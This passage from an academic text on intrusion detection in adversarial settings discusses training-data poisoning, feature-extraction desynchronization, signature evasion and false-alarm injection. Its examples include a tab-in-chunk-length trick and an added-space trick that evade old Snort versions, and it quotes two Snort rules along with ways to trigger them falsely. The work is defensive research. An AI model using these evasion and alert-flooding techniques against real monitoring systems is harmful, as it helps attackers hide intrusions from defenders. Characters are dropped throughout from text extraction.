tected. Typically these attacks are designed to exploit buer overow vulnerabilities
to execute some useful CPU instructions on the target machine, and escape the de-
tection by IDS using polymorphism, that is, dierent instances of the same attack
are generated to evade signature-based IDS. To detect such attacks, the authors pro-
posed a NIDS-embedded CPU emulator. First a heuristic detection method scans
the network trac searching for suspicious instruction sequence, then the CPU em-
ulator executes the suspicious sequences. The behavior of the suspicious sequence
is then evaluated to detect shellcode execution. In this case, the CPU emulator
is a way to perform data preprocessing and enhance the data, as the analysis is
performed on the output of the CPU emulator rather than on the network trac
data.
It is worth to note that the data enhancement task can be useful to design an
IDS that is robust with respect to an adversarial environment. In this case, for
an adversary it is more dicult to inject noise, because spurious trac instances
(noise) that do not generate dangerous behavior on the target host (that is, such
trac instances do not represent attacks) can be discarded.
5.3. Feature selection 107
5.3 Feature selection

Motivation and purposes As previously discussed, data preprocessing is the
rst step in assessing the information related to legitimate and/or the attack classes.
The feature selection step aims at dening an optimal set of measures on the pre-
processed data that allows attaining the best discrimination between attack and
legitimate activity patterns. This set of features is dened and extracted using prior
knowledge available for each one of the two classes.
5.3.1 Adversarial environment against Feature Selection: Prob-

lems
An adversary can aect both the feature denition and the feature extraction tasks.
With reference to the feature denition task, an adversary can interfere with the
process if this task has been designed to automatically dene features from input
data. This is true if automatic adaptation mechanisms are used. With reference
to the feature extraction tasks, the extraction of correct feature values depends on
the tool used to process the collected data. This problem is similar to the desyn-
chronization attacks against network data acquisition described in Section 5.1.1.1,
where the attacker can exploit dierences between feature extraction as it would
be performed on the monitored system, and feature extraction as performed by the
IDS.
Let us make an example related to an attack against the feature denition pro-
cess. The worm signature generator Polygraph [Newsome et al. (2005)] is vulnera-
ble to deliberate noise injection aimed at misleading the signature generator so that
incorrect features are extracted [Perdisci et al. (2006) (a), Newsome et al. (2006)].
In particular, Polygraph pre-processes trac data so that it is inserted into one
of two pools: legitimate pool and suspicious pool. Then, common features of the
suspicious pool are used to dene the characteristics of attacks. An adversary can
pollute the suspicious trac ows to force Polygraph to generate signatures using
wrong features. This is possible because, as evidenced in Section 5.2, an adversary
can inject some trac identied as suspicious but that do not reect worm activi-
ties (that is, they do not represent attacks). This trac aect the reliability of the
IDS, because it is well-crafted to induce a choice of a feature space which does not
guarantee the expected discrimination capabilities between attacks and legitimate
activity patterns. It is worth to note that in [Perdisci et al. (2006) (a)] only noise
aecting the suspicious trac pool is considered. However, following the general
denition of noise proposed in Section 5.2, we can extend this reasoning to an ad-
versary that injects patterns that are not representative of legitimate activity, but
not necessarily related to attacks. These patterns can be included in the legitimate
trac ow that is used by Polygraph to verify the quality of extracted features that
minimize the false alarm rate. Thus, if patterns similar to attack patterns are in-
jected in the legitimate trac pool, the system may be forced to choose low quality
features when minimizing the false alarm rate. This example is useful to point out
that in every IDS both types of noise must be considered.

Now, let us make an example of an attack against the feature extraction process.
In [Mutz et al. (2005)], the authors show an attack against the parser of the open-
source IDS Snort that avoids the correct extraction of the chunk length value related
to an HTTP message chunk. HTTP version 1.1 chunked encoding allows HTTP
messages to be broken up into multiple parts called HTTP chunks. Following the
relative RFC, every chunk must declare the byte length of its content in the rst
line. For example, if a chunk has 255 bytes, its rst line will be ff\r\n (hexadecimal
value, followed by Carriage Return and Line Feed chars). By adding a tab character
as in ff\t\r\n Snort v. 2.1.1 fails to acquire the chunk length value (255 bytes).
In such a case, Snort leaves the variable containing the chunk length value with the
initial value (zero), while the HTTP server Apache v. 2.0.1 still correctly acquires
the ff value. Thus an attacker not only can design an evading attack, but can also
inuence the (acquired) value of a feature.
5.3.2 Adversarial environment against Feature Selection: Solu-

tions
Even if many research works have been published on feature selection, to the best
of our knowledge none of these works coped with an adversarial environment.
As far as attacks against feature denition are concerned, in our opinion the ef-
fectiveness of the attack depends on the knowledge of the attacker on the algo-
rithm used to dene the optimal set of features, the better the knowledge, the
more eective the attack. As security through obscurity is counterproductive,
we propose as a possible solution the denition of a large number of redundant
features. Then, random subsets of features could be used at dierent times, pro-
vided that a good discrimination between attacks and legitimate activities in the
feature space is attained. This approach has been used in dierent elds, i.e.,
biometrics [Yong and Yangsheng (2006)], image retrieval [Tao et al. (2006)], bio-
molecular analysis [Bertoni et al. (2004)], typically to reduce the dimensionality
of feature subspaces and thus the well-known curse of dimensionality problem
2
[Duda et al. (2000)]. In this way, an adversary is uncertain on the subset of fea-
tures that is used in a certain time interval, and thus it can be more dicult to
conceive eective malicious noise. However, it should be recognized that the use of
random subsets of features must be careful designed to guarantee a high discrimi-
nation capability between attacks and legitimate activities.
As far as attacks against the feature extraction process are considered, the key
point is that this task must be strictly related to the data processing as performed
by the monitored systems. It should be clear from Section 5.1.1.1 that the feature
extraction process on the IDS may be dierent from that of monitored systems. This
may be caused by the fact that dierent implementations of the standards on which
IDS and hosts rely on may cause dierent feature values. It should be recognized
that, in practice, it is denitely a hard task to guarantee this synchronization
2
We will further discuss about this problem in Section 5.5.5.
5.4. Model Selection 109
between IDS and monitored systems. In our opinion, a way to address this problem
from the root can be the use of host based data acquisition. In particular, the
monitored system itself could send the features extracted from input data to the IDS:
in this way the problem can be addressed. Evidently, in such a solution, monitored
system and IDS are strictly coupled: this implies, at least, a lower exibility of the
IDS input source choice. However, it must be recognized that a solution can be
based on virtual machines, to both guarantee synchronization between IDS and
monitored system, and more exibility [Garnkel and Rosenblum (2003)].
5.4 Model Selection

In this Section we discuss about problems and solutions of the model selection in the
adversarial environment context. This aspect is particularly interesting for future
IDS solutions, that, due to the increasing number and complexity of threats, are
expected to increase the adoption of (automated) model selection techniques.
Motivation and purposes The model selection phase aims at describing (mod-
eling) patterns associated to attacks and/or legitimate activities, using a set of
training patterns. It should be clear from the previous sections that the labeling of
data for the creation of the training set is not an easy task, and that this activity
is vulnerable to adversaries that try to pollute the data. These patterns are de-
scribed using the features dened and extracted in the feature selection phase. A
model for attack and/or legitimate activity patterns is then selected so that the best
discrimination between these two classes on the training set, or on a validation set,
is attained. The selected model is then used to assign data processed by the IDS to
one of the two classes during the classication phase.
5.4.1 Adversarial environment against Model Selection: Problems

We have already discussed about adversaries that exploit vulnerabilities of the IDS
in data acquisition, data pre-processing and feature selection, in order to inject noise
in the training set used to perform the model selection. This noise is aimed to aect
model selection so that the resulting discrimination capability between attacks and
legitimate activity patterns is reduced w.r.t. a model selected using a noise-free
training set. In this way, due to a non-optimal or erroneous model, some patterns
related to attacks could be classied as legitimate (that is, the IDS can be evaded),
or some patterns related to legitimate activities could be classied as attacks (that
is, the IDS generate false alarms).
In order to automatically perform the model selection, machine learning algo-
rithms have been extensively applied, especially in recent years. The eectiveness of
machine learning techniques is strictly related to the representativity of the training
set w.r.t. the patterns that will be analyzed during the detection phase. However,
no matter how carefully the training data has been collected so that it is representa-
tive of typical working conditions, training data cannot be considered noiseless, as
stated in sections 5.1, 5.2 and 5.3. Here we identify two principal noise components
that should be taken into account when designing machine learning algorithms:
• independent noise; this is made up of noisy patterns that appear in the

training set regardless of the fact that a machine learning algorithm is used.
That is, there is no correlation between the fact that such patterns are ob-
served, and the fact that a machine learning algorithm is used.
• malicious noise; this is made up of noisy patterns that appear in the training
set depending on the fact that a machine learning algorithm is used. These
patterns are intentionally inserted by an adversary so that the machine learn-
ing algorithm is misled by using these patterns to model a class they don't
belong to. These patterns thus allow some control of an adversary over the
model selection phase. In the literature, this operation is often referred to as
mis-training.
These two types of noise can be more clearly dened if we refer to a specic
IDS paradigm. Let us analyze the eect of these two types of noise when anomaly-
based IDS are considered. We can collect the data and assume that all patterns
belong to the legitimate class .
3 In this case, the independent noise is made up
of attacks against the monitored host(s) that are collected during the acquisition
of the training set. These attacks can be considered as accidentally contained
in the training data, because actually the attacker goal was not to interfere with
the correct model selection. Typically the small percentage of independent noise
is correctly handled by learning algorithms, and it doesn't signicantly aect the
design of the anomaly detector. On the other hand, an adversary can intentionally
pollute the training set with patterns that do not represent legitimate activities
(malicious noise). Such patterns may be crafted in order to signicantly aect the
selection of the model of the legitimate activity.
To explain machine learning algorithms capabilities and problems, an at-

tack against a learning system can be classied by analyzing its inuence
(causative /exploratory ), specicity (targeted /indiscriminate ) and security vio-
lation (integrity /availability ) [Barreno et al. (2006)]. A causative attack inuence
the training process, instead an exploratory attack do not alter the training, but
try to discover information about the learner (e.g. training data used). An attack
is targeted if its goal is well-dened (e.g. to further exploit a specic vulnera-
bility), instead is indiscriminate if its goal is general (e.g. to increase IDS false
negative/positive rate). An integrity attack exploit training algorithm weaknesses,
forcing it to classify intrusion points as normal points (false negatives), instead an
availability attack alter training system knowledge so that it becomes useless (e.g.
too many false positives/false negatives). It is worth to note that a causative attack
reects exactly our denition of malicious noise.
3
This can be a reasonably assumption in a real world scenario, because usually the great majority
of patterns belong to this class [Kruegel et al. (2005) (a)].
5.4. Model Selection 111
Behind the general inuence of the malicious noise on the model selection, dif-
ferent classes of machine learning algorithms may exhibit dierent strengths in front
of an adversarial environment. For the sake of the following discussion we subdivide
machine learning algorithms into incremental (on-line), and o-line training algo-
rithms. Incremental algorithms modify their model incrementally, that is, the model
may change every time a new pattern is processed. These systems are useful to deal
with systems in evolution, as every time they analyze a pattern, they can adapt their
model. Conversely, o-line algorithms need a well-specied training set, and they
can analyze patterns only after the entire training set is available. In other words,
training and analysis phases are performed in non overlapped time intervals, and the
adversary has a bounded time interval to inject malicious noise, that is, the time
interval when training data is acquired. As evidenced in [Barreno et al. (2006)],
incremental algorithms allow for a gradual tampering of training data. This fact
forces the adversary to follow a dierent attack strategy, in front of incremental,
and respectively, o-line training algorithms.
5.4.2 Adversarial environment against Model Selection: Solutions

The above discussion clearly points out that learning algorithms should be carefully
designed to deal with malicious errors. A learning algorithm that has been specif-
ically designed to take into account malicious patterns in the training set is the
distribution-free model of learning [Valiant (1985)]. In addition, some extensions to
this model have been proposed so that a bound on classication errors can be xed
[Kearns and Ming (1988)]. However, in our opinion, the use of these techniques in
the intrusion detection domain is far from the practice, as the theoretical formulation
of the learning algorithm should be carefully mapped to the problem of computer
intrusions.
In general, to cope with malicious noise, we identify a possible advantage if only

the legitimate activity class is used to select the model (anomaly-based IDS) and
an o-line training algorithm is used. That is, we can assume the great majority of
patterns in the training represents the target class. In this case, the malicious noise
is only associated to patterns non representative of the legitimate class.
Since an o-line training algorithm is used, the attacker has a bounded time
interval to inject malicious noise. That is, he may leverage on a relatively low
number of malicious patterns w.r.t. the total number of patterns in the training
set. Thus, in order to signicantly aect the model selection, the attacker has to
inject patterns signicantly dierent from those representing the target class. In
such a way, during the classication phase, some attacks may go undetected (false
negatives), e.g. because such attacks share some similarities with the malicious noise
in the training set. However, since malicious patterns must be signicantly dierent
from those representing the legitimate class, they may be removed by means of
outlier detection techniques.
If the learning system is aimed at modeling the attack class, an analogous pro-
cess may not be suitable. In this case, we may not assume that the great majority
of patterns in the training set represents the target class. If we exclude legitimate
activity patterns in this training set (i.e., those legitimate patterns that have mistak-
enly passed the preprocessing phase), both patterns related to attacks and pattern
related to malicious noise have same source: the adversary. This implies that the
ratio between number of attack patterns and malicious patterns in the training set
depends only by the adversary. So, in this case, the condence on the estimation of
the data distribution may be more weak.
In our opinion, a key point in model selection relies on whether an attacker

has the exact knowledge on the details of the model selection phase, so that it can
be inuenced by malicious patterns. The adversary can use the knowledge of the
used machine learning algorithm and its training set to make up malicious noise.
However, we note that this knowledge does not imply that the attacker is able to
conceive eective malicious noise. For example, a machine learning algorithm can
be selected randomly from a predened set. As the malicious noise have to be well-
crafted for a specic machine learning algorithm, the adversary cannot be sure of the
attack success. Furthermore, the machine learning algorithm random initialization
may be useful to deal with malicious noise. For example, if Hidden Markov Models
(HMM) are used, we can provide for random initialization for state transition and
symbol emission probability matrix. Generally, this set-up is made when no a priori
information is available regarding the structure of sequences in the training set.
To be eective, malicious noise may have to be conceived considering the used
initialization, because, for example if the Baum-Welch algorithm is used, the nal
HMM depends on the initial parameters. So, due to dierent random initializations,
the adversary may not know exactly how to conceive malicious patterns to aect,
to its own advantage, the model selection. The same reasoning can be applied to
every machine learning algorithm, for instance, used to train neural network, or to
perform clustering (e.g. k-means). In fact, at high level, some kind of randomization
procedure have been suggested as possible way to address targeted malicious noise in
[Barreno et al. (2006)]. Finally, when an o-line algorithm is employed, it is possible
to randomly select the training patterns: in such a way the adversary is never able to
know exactly the composition of the training set. This approach has been applied to
cope with noisy patterns in anomaly-based intrusion detection [Cretu et al. (2008)].
5.5 Classication and result analysis

In this Section we discuss problems and solutions of the classication and result
analysis phase in an adversarial environment. Two approaches are typically used
to perform classication, i.e., anomaly and misuse based detection. Misuse and
anomaly based IDS have dierent pros and cons in front of an adversarial environ-
ment. In this Section we describe the vulnerabilities of this step and the proposed
solutions, by analyzing misuse and anomaly based IDS separately. Finally, we pro-
pose some general solutions, in sections 5.5.5 and 5.5.4, which are mainly based on
Ensemble approaches.
5.5. Classication and result analysis 113
Table 5.1: Summary of the key issues of the classication and result analysis step.
ATTACK DETECTION TECHNIQUE

TECH-
NIQUE
Misuse-based Anomaly-based
Evasion the adversary may modify an the adversary may modiy an

attack so that the new attack attack to mimic normal trac
instance does not match with patterns (Section 5.5.3.1)
any signature for this attack
(Section 5.5.2.1)
False Alarm the adversary may submit pat- the adversary may submit
Injection terns which match with one anomalous patterns which do
or more signatures, but that not reect any threat for
do not reect any threat for the monitored systems (Sec-
the monitored systems (Sec- tion 5.5.3.2)
tion 5.5.2.2)
Motivation and purposes The classication and result analysis step represents
the nal phase of the intrusion detection task. In this step an alert is produced
if the observed pattern is evaluated as being related to an attack by the model
selected in the previous phase. Then, a further step can be performed that is
aimed at analyzing these results using a higher level interpretation of events. This
phase is usually called alarm correlation as the evidence of an attack is better
seen by clustering alarms related to the same event, while removing spurious alarms
produced by noisy patterns.
5.5.1 Problem overview

There are two principal ways a skilled adversary can use to aect this step, and hide
attack traces:
• Intrusion Detection Evasion aimed at preventing the detection of an attack

by the IDS;
• False Alarms Injection or over-stimulation aimed at ooding the traces of a

successful attack detected by the IDS with a very large number of false alarms,
that is, noise.
Detection evasion is attained by an attacker when a successful attack against mon-

itored hosts is not detected by the IDS. Thus, no alerts related to this attack are
recorded in the alerting log of the IDS. Obviously, this is an undesirable situation.
On the other hand, the risks related to over-stimulation are less obvious. Let us
recall that the alert log of an IDS needs to be analyzed by a security administrator,
and consequently the presence of false alarms requires a huge analysis eort, espe-
cially in networks with high volumes of trac. An adversary can deliberately inject
false alarms to increase this eort, exploiting IDS classication weaknesses. Table
5.1 summarizes how these two techniques may aect anomaly- and misuse-based
classication, respectively. A distinct paragraph is dedicated to the analysis of each
one of these issues. However, before such an analysis, in the following Section we
discuss more in detail about false alarm injection, as we believe that it is a less
evident problem in the research literature.
5.5.1.1 False Alarms Injection (over-stimulation)
As discussed in the introduction, even if all attacks have been detected and the
related alerts have been stored, they might not be easily extracted from the alert
log due to high volumes of false alarms. An estimation of the probability that given
an alert this reect a real attack can be written as:
attackN um(log)
P (attack|alert) = (5.1)
alertN um(log)
where attackN um(log) and alertN um(log) represent the number of real attacks,
and the number of alerts, respectively, for a given IDS log . This probability reects
what we will call alerting log reliability : the closer this value to one, the higher the
alerting log reliability. Obviously, the larger the number of alerts used to estimate
the reliability, the closer this estimation to the real P (attack|alert). In real world
cases, real attacks are extracted from the IDS log through a thorough log analy-
sis accomplished by the security auditor(s), using their expertise, and some semi-
automated alert clustering/correlation mechanisms. For an enterprise that manages
high volumes of network trac (i.e., an Internet Service Provider (ISP)), this eort
translates into high costs and the allocation of huge resources. Analogously to the
classication of noise given in Section 5.4, it is possible to single out two principal
types of false alarms:
• legitimate activity patterns (that is, patterns generated by users using services
as expected) classied as attacks;
• injected (malicious) patterns conceived to be classied as attacks, but that ac-

4
tually do not represent attacks . False Alarm Injection is the act of generating
such patterns.
The common practice followed during the testing phase of an IDS for the evaluation
of the false positive (alarm) rate is carried out by submitting instances of legitimate
4
These patterns do not reect attacks against monitored hosts. In some sense, they can be
considered as attacks against the information content of the alerting log, as they aim to decrease
the signal to noise ratio of the alerting log content.
activity to the IDS, and by keeping track of the alerts generated accordingly. The
result of this evaluation clearly provide a lower bound for the false positives rate
as it does not take into account the contribution of false alarm injection. Let us
explain how the over-stimulation problem can aect the alerting log reliability. Let
us express the probability P (attack|alert) using the Bayes formula, as made by
Axelsson [Axelsson (2000)]:
P (alert|attack) · P (attack)
P (attack|alert) =
P (alert|attack) · P (attack) + P (alert|¬attack) · P (¬attack)
(5.2)
Let us assume the availability of an IDS that detects all attacks, that is,
P (alert|attack) = 1. The equation 5.2 can be rewritten as:
1
P (attack|alert) =
1+α
(5.3)
P (alert|¬attack) · P (¬attack)
α=
P (attack)
The higher the value of α, the lower the value of the alerting log reliability. By
following the previous denition, the probability of false alarms P (alert|¬attack) ·
P (¬attack) can be expressed as the sum of two independent terms:
P (alert|¬attack) · P (¬attack) = P (alert|legitimate) · P (legitimate)

+P (alert|malicious) · P (malicious)
(5.4)
with:
P (legitimate) + P (malicious) = P (¬attack)
where P (legitimate) is the probability that the pattern is legitimate, P (malicious)

5
is the probability that the pattern is malicious , P (alert|legitimate), and
P (alert|malicious) are the probabilities that an alert is raised, given a pattern
that is legitimate or malicious, respectively.
In a typical real situation, legitimate activities largely outnumber attacks, that
is, P (legitimate) À P (malicious) and we can expect that P (malicious) ∼
P (attack), because malicious patterns are produced by the adversary. However,
we expect also that P (alert|legitimate) ¿ P (alert|malicious), because for an ef-
fective IDS P (alert|legitimate) must be very low, and P (alert|malicious) should
be very high, if we suppose well-crafted (and thus eective) malicious patterns. As a
consequence, the contribution given by false alarm injection can be very signicant.
For example, if we have:
• P (alert|attack) = 1 i.e., the IDS detects all attacks
• P (alert|legitimate) = 0.005: i.e., the IDS is good in producing a very low

false positive rate
5
This malicious pattern is conceived so that an alert is raised, but it is not an attack from the
point of view of monitored hosts.
• P (alert|malicious) = 0.99 i.e., a malicious pattern is conceived to successfully

raise an alert
• P (legitimate) = 0.996 i.e., legitimate patterns are the great majority of non-
attack patterns
• P (malicious) = 0.003 for each 3 false alarms injected. . .
• P (attack) = 0.001: . . . the adversary performs an attack
Combining equations 5.3 and 5.4:

α = [P (alert|legitimate) · P (legitimate) + P (alert|malicious) · P (malicious)] /P (attack) =
((0.005 · 0.996) + (0.99 · 0.002))/0.001 ' 8, thus P (attack|alert) = 1/(1 + α) =
1/9 ' 11%. Thus, to nd an alert related to a successful attack, 9 alerts must
be scrutinized on average. On the other hand, if attackers do not use over-
stimulation, and only aim to attack the protected hosts, then P (attack) = 0.004:
P (attack|alert) = 1/(1 + α) = 1/3.45 ' 29%, that is, the alerting log reliability
signicantly increases.
This example is useful to light out that real IDS capabilities can be overesti-
mated, often with surprising consequences. Whereas most of the eorts spent
during the development of an IDS are focused on the maximization detection ca-
pability, often, less eorts are devoted to the false alarm rate bounding, and in
particular to the false alarm injection problem.
Now the question is: How to protect an IDS against false alarm injection?.
In the following, we will give some answers, by observing that anomaly and misuse
based IDS have dierent strengths and weaknesses not only w.r.t. detection evasion,
but also w.r.t. false alarm injection.
5.5.2 Misuse-based classication and result analysis

Motivation and purposes A misuse-based IDS detects attacks by comparing
observed patterns to stored attack signatures. Essentially, such an IDS looks for
known attacks, described through a precise model (signature). So, the number of
false alarms generated by legitimate activities can be very low if signatures are very
specic.
5.5.2.1 Misuse-based Detection evasion
The ability of a Misuse-based IDS to detect attacks is strongly aected by the qual-
ity of corresponding signatures, but also limited to known attacks. The denition of
these signatures mainly relies to human expertise, as in Snort, or machine learning
algorithms, as in Polygraph. Unfortunately, manually or automatically building
good signatures is very dicult. Attacks that exploit a specic vulnerability can
succeed in many dierent ways (many attack instances, that exploit the same vul-
nerability), and building models that take into account all those instances is very
hard. As evidenced in [Mutz et al. (2005)], generally a Misuse-based IDS allows de-
tecting all event sequences that match a signature, but these signatures only cover
a subset of all the possible instances of the same attack.
Conversely, a Misuse-based approach allows for low false alarm rates, because
for all known attack instances it is possible to select the most discriminant features,
and the corresponding values. In fact, both commercial [IBM ISS IPS, Cisco IPS]
and open source (e.g. [Snort]) IDS rely heavily on the misuse paradigm for such a
suitable peculiarity.
A way to estimate the quality of a specic signature is to build many variants
of the same attack and evaluate the fraction of detected attacks. The authors in
[Vigna et al. (2004)] describe such an estimation procedure where a large number
of attack variants is generated by applying mutant operators to an attack template.
That is, a mutant operator builds dierent attack instances having the same attack
template. A similar work using a genetic algorithm to generate dierent instances
of a buer overow attack is presented in [Kayacik et al. (2006)].
The automatic development of an evading attack needs the perfect knowl-
edge of the signatures used by the IDS to be evaded. Commercial systems typ-
ically rely on keeping the signatures secret to increase their resistance to evasion
or over-stimulation attacks. However, in the intrusion detection research eld
it is well-known that security through obscurity does not work. The authors in
[Mutz et al. (2005)] proved this assertion by using a reverse engineering process to
understand the way signatures are matched by a commercial (ISS Realsecure version
7.0) misuse-based NIDS.
In [Mutz et al. (2005)] it is also shown a successful HTTP chunk encoding attack
(see Section 5.3.1) that evades the detection by Snort. The signature implemented
in Snort for this attack is based on matching the content of TCP packets with a
xed string CCCCCCC:\ < space >AAAAAAAAAAAAAAAAAAA. In this case, the signature
represents the description of a single attack instance. As a consequence, it is easy to
see that by simply adding another space in the attack string (obtaining CCCCCCC:\ <
space >< space >AAA...) the same attack works successfully (because server-side
eects do not change), and it is unnoticed because the string matching procedure
fails.
Misuse-based Detection evasion: Solutions Typically, an adversary can

evade the detection of a misuse-based IDS, because:
• either the IDS does not have the signature for that attack;
• or the IDS have a signature for that attack, but it does not match with the
specic attack instance.
Machine learning algorithms represent a very interesting response to attacks for

which a signature is not available. Furthermore, to realize evading attacks, a good
knowledge of the used signatures is necessary. In this case, as evidenced in Section
5.4.2, for an adversary it can be dicult to realize evading attacks if the machine
learning algorithm has been designed so that signatures cannot be exactly extracted
by an attacker by a query-response mechanism. However, in our opinion, an eective
solution against evasion in misuse-based IDS involves both the signature denition
process, and the choice of the signature matching techniques.
Usually, an attack signature is implemented as a set of rules, following a spe-

cic syntax. To detect various types of evading attacks and decrease the evasion
probability of the rule-based pattern matching, it is possible to use a Two-step Rule
Estimation (TRE) [Byeong-Cheol et al. (2004)]. Such a method pregures two pro-
cesses: (1) a preprocessor searches for the optimal rule similar to a captured packet,
(2) a processor performs an adaptive pattern matching. The TRE method can ad-
dress evading attacks because it adds some exibility in the signature denition
process that can help to nd attack variations. It should be interesting to investi-
gate if such a method can be used in the classication phase of a signature generator
based on machine learning algorithms. That is, behind the enhancement of the sig-
nature building phase, it can be useful to enhance the capabilities of the signature
matching phase.
Behind general solutions, there are specic solutions that can enforce or tune
a correct misuse detection. Much attention is given to buer overow attacks,
especially when polymorphic mechanisms are used to escape from IDS detection.
The authors in [Akritidis et al. (2005)] detect polymorphic buer overows,

searching the network trac for a sled component. A sled component is a set
6
of additional instructions (i.e. NOP instructions ) used by these attacks to cope
with the approximate knowledge of the absolute address where the stack starts.
Biologically inspired systems have been also proposed. Biological analogies are
useful because many problems that researchers try to confront, are already solved
(or very reduced) in nature. In [Stephenson and Sikdar (2006)] is proposed a model
based on coevolution of biological quasi-species to describe polymorphic worms prop-
agation. In such a work, the worm evasion problem is posed principally in terms
of mutation rate time. Given this model, it is possible to calculate the maximum
allowable response time of the IDS in order to contain the spread of the worm,
and the optimal mutation rate that a polymorphic worm should employ in order
to evade an IDS with a known response time. That is, even if an IDS has a good
machine learning technique to model polymorphic worm attacks, a worm can still
evade detection because the time response of the IDS is too long with respect to the
worm mutation rate. Thus, it can be useful to know if a worm cannot be detected
for this reason. That work lights out that machine learning systems can be used to
evaluate some characteristics and performance of an IDS.
A polymorphic worm can encrypt its own invariant parts to escape from a
signature-based IDS detection. But, in such a case, it is necessary a decryption
routine before launching the worm exploit. Thus, with a NIDS, self-decrypting
exploit codes can be detected by scanning network trac for the presence of
6
These operations do not aect the exploit behavior, but they are useful to increase the program
counter of the CPU, until the address of the injected shellcode is reached.
a decryption routine, using static analysis and emulating instruction execution

[Zhan et al. (2007)].
We note that the many works regarding misuse-based IDS are suited for spe-
cic (new) problem instances. Because of this, often these solutions can be easily
bypassed by a skilled adversary. It should be recognized that, to cope with eva-
sion techniques against misuse-based IDS, it is needed to focus on root causes of
an attack, avoiding signatures for specic attack instances. Through the knowledge
of attack root causes, it is possible to focus on discriminant features, reducing the
impact of evasion techniques. Even if this is not a trivial task, this is the key point
of a reliable misuse-based IDS.
5.5.2.2 False alarm injection against Misuse-based Classication
The signatures of a misuse-based IDS represent the result of an accurate analysis of

the distinctive features of an attack with respect to the legitimate activity. There-
fore, it is typically dicult that a misuse-based IDS classies a pattern generated by
a normal user (i.e., an instance of legitimate activity) as an attack. Unfortunately,
an attacker can generate patterns that explicitly match with the signatures of the
IDS, even if these patterns do not represent attacks from the point-of-view of the
protected hosts. Essentially, this is possible because:
1. the attacker has the knowledge of the IDS signatures, and he uses this knowl-
edge to craft patterns that match with the signatures;
2. a stateful pattern analysis is not correctly performed (or it is not performed

at all) to assess if this pattern is actually related to an attack or not.
With reference to item (1), this knowledge can be easily gained if the signatures
of the target IDS are publicly available (e.g, the open-source IDS project Snort).
On the other hand, if an automatic signature generator is used, then it is more
dicult to gain exact knowledge of the signatures, because each signature depends
on the training data. Typically automatic signature generators are implemented by
machine learning algorithms. However if the adversary gains access to the training
data, and the machine learning algorithm used to generate the signatures is known,
then he may reconstruct the signatures. In Section 5.4.2, we discussed about a
possible solution based on randomization techniques. Furthermore, if the adver-
sary is able to access the outputs of an IDS, he can infer the signatures through
suitable queries. As an example, an adversary can submit patterns with dierent
feature values, and, by accessing the outputs of the IDS, he can try to reconstruct
the internal signatures IDS. This is a reverse engineering approach, the same used
in [Mutz et al. (2005)] to reconstruct the signatures of the commercial NIDS ISS
Realsecure.
No matter how the adversary gains the signatures of the target IDS, it has
been shown that for an attacker it is possible to generate non-malicious packets
crafted to match any signature, thus injecting an unbounded number of false alarms
[Patton et al. (2001), Yurcik (2002)]. In particular, real world examples are carried
out on Snort, for the availability of the signatures. In the following we will refer to
Snort as an example, but the related comments are valid whenever the attacker is
able to gain the signatures.
As far as item (2) is concerned, it is worth to point out that often there is the
need to analyze only some stateful features of the trac, because of an excessive
expense in terms of memory capacity and computation needed to perform a complete
stateful analysis. Especially when large volumes of trac are involved, typically a
trade-o between the need for stateful analysis by the IDS, and the need for real-
time detection capabilities, becomes necessary. This implies an exposure to false
alarm injection, based on those stateful features that are not considered by the
IDS for real-time constraints. For example, Snort v. 1.6.3 was vulnerable to false
alarm injection, because it did not perform a stateful analysis of a TCP session
[Patton et al. (2001), Yurcik (2002)]. For example, the Snort signature:
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 (msg:"EXPLOIT

ssh CRC32 overflow filler"; content:"|00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00|"; reference:bugtraq,2347;
reference:cve,2001-0144;
raise an alert for every TCP packet containing the bytes specied by the content
eld to detect a buer overow against a SSH server, without assessing whether
such a TCP packet pertains to a TCP session or not. Even if a TCP packet that
does not pertain to a TCP session is discarded by the destination host, a false alert
is raised by Snort if such a packet contains the bytecode specied by the signature.
Even if the versions of Snort starting from 2.1.1 have a module that performs the
TCP session reconstruction (stream4), it is still vulnerable to false alarm injection
(and evasion), using attacks related to the HTTP level. Let us make an example.
The signature:
alert tcp \$EXTERNAL_NET any -> \$HTTP_SERVERS \$HTTP_PORTS

(msg:"WEB-IIS NewsPro administration authentication attempt";
flow:to_server,established; content:"logged,true"; reference:
bugtraq,4672; classtype:web-application-activity; sid:1756; rev:5;)
uses the stream4 module to assess if the analyzed TCP packet pertains to a TCP
session (flow:to_server,established statement). However, even if this signature
is related to an attack at the HTTP level, it does not consider the meaning of
HTTP messages because it does not perform stateful analysis at the HTTP level.
Instead, it simply looks for the string logged,true anywhere in the HTTP trac.
Obviously, in this case false alarms can be easily injected by simply adding such a
string in the HTTP trac ow.
The latter example can be useful to note some dierences between evasion and
over-stimulation points of view. If we suppose that the string logged,true is a
necessary content value for the attack, a stateful analysis at HTTP level does not
increase the robustness against evading attacks, that is, we can neglect the HTTP
session analysis. Conversely, from the over-stimulation point of view, the statefulness
is fundamental. The key question is Is the matched (anywhere) string logged,true
a real sign of attack?. We can thus conclude that such a signature is written by
taking into account the point of view of attack detection rather than a trade-o
between detection and false alarms production.
False alarm injection against Misuse-based Classication: Solutions As

discussed previously, to perform false alarm injection (but also evasion) against a
misuse-based IDS, it is needed to know (or infer) the signatures employed by the
IDS. Thus, if the attacker does not have such a knowledge, it may be dicult to
perform false alarm injection. However, in our opinion, an eective solution against
false alarm injection in misuse-based IDS, must be developed at the abstraction level
where the analysis is performed. This abstraction level is reected in the signature
denition. The key question to ask can be: Does the signature describe patterns
at the abstraction level where the attack works? The answer to this question is
strictly related to the stateful analysis.
From our experience, almost every analysis of an IDS must be stateful to guar-
antee detection reliability. Even if the analyzed protocol is stateless (e.g., UDP),
often it is better to base the analysis on additional contextual information w.r.t. the
actual content of a single packet. A clear example of stateful analysis in the case
of non stateful protocol, is given by the detection of portscan attacks. Portscan
attacks probe the hosts in a network to nd open ports and, therefore, the related
services (e.g. exploitable services). For example, such attacks can be realized by
sending UDP or TCP SYN packets to multiple ports, and evaluating the correspond-
ing responses. A single UDP packet does not necessary imply a portscan attack,
as many applications use this protocol (e.g., video streaming). At the same time, a
single TCP SYN packet can be the rst step of the three-way handshake protocol
used to initiate a TCP session. However, by performing a stateful analysis, that is,
correlating network events occurring at dierent times, it is possible to assess if a
certain UDP or TCP SYN packet is likely to be related to a portscan attack or not.
Now, let us refer to the (now historic) Ping of the Death attack [Kenney (1997)].
This attack is based on the generation of an IP packet larger than the maximum IP
packet size, as reported in [RFC 792 (1981)] (65,535 bytes). A Ping of Death attack
instance is often realized by sending an ICMP echo reply subdivided in multiple
fragments that are reassembled only by the destination host. Even if the ICMP is
